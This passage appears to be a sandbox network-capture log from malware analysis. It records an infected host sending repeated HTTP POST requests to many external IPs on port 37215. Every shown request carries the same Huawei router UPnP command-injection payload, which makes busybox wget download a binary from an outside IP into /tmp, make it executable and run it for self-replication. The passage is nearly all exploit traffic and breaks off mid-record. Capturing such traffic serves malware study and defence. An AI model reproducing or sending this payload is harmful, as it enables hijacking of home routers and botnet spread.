                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1845192.168.2.1355922197.217.34.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640803099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1846192.168.2.1342332142.218.184.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640803099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1847192.168.2.134518278.71.16.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643213987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1848192.168.2.1334406197.77.237.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643241882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1849192.168.2.134344241.179.47.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643280029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1850192.168.2.135900441.249.122.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643315077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1851192.168.2.1344158197.157.91.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643362999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1852192.168.2.135720441.60.70.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643754959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1853192.168.2.1338238157.172.175.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643861055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1854192.168.2.1355220157.214.88.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643861055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 